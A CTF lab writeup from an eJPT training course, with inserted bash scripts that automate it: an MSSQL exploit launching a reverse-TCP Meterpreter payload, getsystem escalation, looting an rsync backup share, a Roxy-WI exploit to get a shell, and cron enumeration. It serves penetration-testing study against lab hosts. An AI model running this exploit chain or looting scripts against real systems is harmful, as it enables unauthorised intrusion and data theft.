eJPT - 3.3 CTF The Metasploit Framework

Hmad

CTF 1

Question 1

Gain access to the MSSQLSERVER account on the target machine to retrieve the first flag.

First, run an Nmap scan against the target. It shows Microsoft SQL Server 2012 listening on port 1433. Search Metasploit for "mssql 2012" and use the exploit module mssql_clr_payload, which authenticates to SQL Server (the sa account by default) and loads a CLR assembly that runs our payload. The module's default payload is 32-bit, so switch to a 64-bit payload before running it:

set payload windows/x64/meterpreter/reverse_tcp

Once the Meterpreter session comes back, drop into a shell with the shell command and change to the root of the C: drive. List the files there and the first flag is waiting.

Question 2

Locate the second flag within the Windows configuration folder.

Change into C:\Windows\System32 and list only the directories with dir /a:d. The config folder is there, but our current user is denied access to it. Exit the shell back to Meterpreter and list the privileges held by our token with getprivs.

We hold SeImpersonatePrivilege, which is what Meterpreter's getsystem needs for its named-pipe impersonation technique, so run getsystem to elevate to NT AUTHORITY\SYSTEM. Then open another shell and read the flag from the config folder.

Question 3

The third flag is also hidden within the system directory. Find it to uncover a hint for accessing the final flag.

To search the system directory recursively for text files:

dir C:\Windows\System32\*.txt /s /b

Here /s recurses into subdirectories and /b prints bare full paths, so only the .txt files appear. Copy the path of the file whose name tells us to escalate privileges and view its contents with:

type C:\Windows\System32\drivers\etc\EscaltePrivilageToGetThisFlag.txt

Question 4

Investigate the Administrator directory to find the fourth flag.

Finally, change into C:\Users\Administrator\Desktop and list its contents to find the fourth flag.
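The whole CTF 1 chain above, scripted as an added example (this is not code from the original post): a msfconsole resource file that sets up mssql_clr_payload with the x64 payload, plus the cmd.exe commands to paste into the shell once getsystem has run. The target address, LHOST and SQL credentials are placeholders, since the writeup does not state them; sa with an empty password is simply the module's default, not a lab fact.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): script the CTF 1 chain as a msfconsole
# resource file plus the Windows commands used afterwards to hunt the flags.
# Target, LHOST and SQL credentials are placeholders; the writeup does not state them.
# sa with an empty password is only the module's default, not a lab fact.

# Emit the resource script that configures mssql_clr_payload with the x64 Meterpreter.
build_mssql_rc() {   # $1 target  $2 our listener address  $3 SQL user  $4 SQL password
    local rhost="$1" lhost="$2" user="$3" pass="$4"
    printf 'use exploit/windows/mssql/mssql_clr_payload\n'
    printf 'set RHOSTS %s\n' "$rhost"
    printf 'set USERNAME %s\n' "$user"
    # only emit PASSWORD when we actually have one; `set PASSWORD` with no value just prints it
    [ -n "$pass" ] && printf 'set PASSWORD %s\n' "$pass"
    # the module's default payload is 32-bit; the target needs the x64 stager
    printf 'set payload windows/x64/meterpreter/reverse_tcp\n'
    printf 'set LHOST %s\n' "$lhost"
    printf 'run -j\n'
}

# Emit the cmd.exe commands for Q1-Q4 (run `shell` in Meterpreter first; getsystem before Q2).
flag_hunt_cmds() {
    cat <<'EOF'
cd C:\
dir
cd C:\Windows\System32
dir /a:d
dir C:\Windows\System32\*.txt /s /b
dir C:\Users\Administrator\Desktop
EOF
}

main() {   # usage: ./ctf1.sh <target> <lhost> [sql_user] [sql_password]
    local rc="ctf1.rc"
    build_mssql_rc "$1" "$2" "${3:-sa}" "${4:-}" > "$rc"
    flag_hunt_cmds > ctf1-windows.txt
    # once the session lands: sessions -i 1, getprivs, getsystem, shell, then paste ctf1-windows.txt
    if command -v msfconsole >/dev/null 2>&1; then
        msfconsole -q -r "$rc"
    else
        printf 'wrote %s; run: msfconsole -q -r %s\n' "$rc" "$rc"
    fi
}

if [ "$#" -ge 2 ]; then main "$@"; fi
```

The resource file is the same sequence of msfconsole commands typed by hand in the writeup; writing it out once means the payload switch is never forgotten on the next attempt.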


CTF 2

Question 1

Enumerate the open port using Metasploit, and inspect the RSYNC banner closely; it might reveal something interesting.

The wording is a little misleading: the rsync daemon is just as easy to enumerate with plain tooling (Metasploit does ship auxiliary/scanner/rsync/modules_list, but it is not needed here). First, run an Nmap scan; it shows rsync listening on port 873. Connect to the daemon and ask it to list its modules:

rsync rsync://target1.ine.local/

Question 2

The files on the RSYNC server hold valuable information. Explore the contents to find the flag.

The listing from that command shows a single module, backupwscohen. List its contents by appending the module name to the same URL:

rsync rsync://target1.ine.local/backupwscohen/

Two files are present. Pull both down to our machine with:

rsync -a rsync://target1.ine.local/backupwscohen/ .

The -a flag is archive mode: it recurses and preserves permissions, timestamps, symlinks and (where allowed) ownership. The trailing period is the local destination, the current directory. Then cat each file to find the flag.
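The rsync enumeration from Questions 1 and 2, as an added example (not code from the original post): it lists the daemon's modules, mirrors each one into a local loot directory with -a, and greps what came down. target1.ine.local is the lab host named in the writeup; the case-insensitive "flag" search pattern is an assumption about the flag format.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): enumerate an rsync daemon, mirror every
# exported module locally and grep the loot. target1.ine.local is the lab host from the
# writeup; the case-insensitive "flag" pattern is an assumption about the flag format.

# Turn `rsync rsync://host/` output ("<module><tab><comment>" per line) into bare module names.
# A daemon MOTD, if one is configured, is printed first and would need filtering out too.
parse_rsync_modules() {
    awk 'NF { print $1 }'
}

list_modules() {   # $1 host
    rsync "rsync://$1/" | parse_rsync_modules
}

# Mirror one module into loot/<host>/<module>. -a is archive mode: recurse and keep
# permissions, timestamps, symlinks and (where allowed) ownership.
mirror_module() {   # $1 host  $2 module
    local dest="loot/$1/$2"
    mkdir -p "$dest"
    rsync -a --list-only "rsync://$1/$2/" >&2   # preview what we are about to pull
    rsync -a "rsync://$1/$2/" "$dest/"
    printf '%s\n' "$dest"
}

# Report every text line mentioning "flag" under a directory, prefixed with file and line number.
find_flags() {   # $1 directory
    grep -rIin 'flag' "$1" 2>/dev/null || true
}

main() {   # usage: ./rsync-loot.sh target1.ine.local
    local host="$1" mod dest
    for mod in $(list_modules "$host"); do
        dest="$(mirror_module "$host" "$mod")"
        find_flags "$dest"
    done
}

if [ "$#" -eq 1 ]; then main "$@"; fi
```

Mirroring every module rather than just the one named in the question is the habit worth keeping: a daemon that exports one readable backup share often exports others.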

Question 3

Try exploiting the webapp to gain a shell using Metasploit on target2.ine.local.

Now load Metasploit and run an Nmap scan against target2.ine.local (db_nmap from inside msfconsole stores the results in the database). Apache httpd is listening on ports 80 and 443. Rerun Nmap with -sC to run its default scripts for more detail, or simply open the site in Firefox: it is running Roxy-WI.

Search Metasploit for a Roxy-WI module and use the exploit it returns. When the session comes back, open a shell and run /bin/bash -i to upgrade to an interactive bash shell. Change to the filesystem root (/) and list it to find the flag.

Question 4

Automated tasks can sometimes leave clues. Investigate scheduled jobs or running processes to uncover the hidden flag.

Cron configuration lives under /etc, so change there and list the directory. Two of the entries are cron related, but we only care about cron.d, which holds the system-wide job drop-ins. cat every file in it to find the final flag. (The system crontab /etc/crontab and the per-user spool under /var/spool/cron are the other places worth checking on a target that does not hand it over this easily.)
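The scheduled-job enumeration from Question 4, as an added example (not code from the original post). It goes beyond the post's cron.d check to every location cron reads from, and lists running processes as the question also suggests. The optional root argument exists so the same checks can run against a copied filesystem (and can be tested offline); on the live target call it with / or no argument.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): enumerate scheduled jobs from the shell
# obtained on target2.ine.local. Covers every place cron reads from, not only /etc/cron.d.
# The optional root argument lets the same checks run against a copied filesystem.

# Print the live (non-comment) lines of every readable crontab under $root.
enumerate_cron() {   # $1 filesystem root, default /
    local root="${1:-/}" f d
    root="${root%/}"
    for f in "$root/etc/crontab" "$root"/etc/cron.d/* \
             "$root"/var/spool/cron/crontabs/* "$root"/var/spool/cron/*; do
        [ -f "$f" ] && [ -r "$f" ] || continue      # unmatched globs and dirs are skipped
        printf '### %s\n' "$f"
        grep -Ev '^[[:space:]]*(#|$)' "$f" || true  # drop comments and blank lines
    done
    # the periodic directories hold scripts rather than schedule lines; list them
    for d in "$root"/etc/cron.hourly "$root"/etc/cron.daily \
             "$root"/etc/cron.weekly "$root"/etc/cron.monthly; do
        [ -d "$d" ] || continue
        printf '### %s\n' "$d"
        ls -l "$d"
    done
}

# Running processes are the other clue the question points at: cron itself and anything it
# spawned appear here. Live system only; the root prefix does not apply.
show_processes() {
    ps -eo pid,user,args
}

if [ "$#" -le 1 ]; then enumerate_cron "${1:-/}"; fi
```

Stripping comments matters on a real box: distro crontabs are mostly commentary, and the one live line a CTF author added is easy to miss in the noise.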


That's it for this section. Next up is the exploitation section.

— Hmad


Written by

Hmad

I'm a cybersecurity enthusiast with a growing focus on offensive security. Currently studying for the eJPT & ICCA, building hands-on projects like Infiltr8, and sharing everything I learn through blog posts and labs.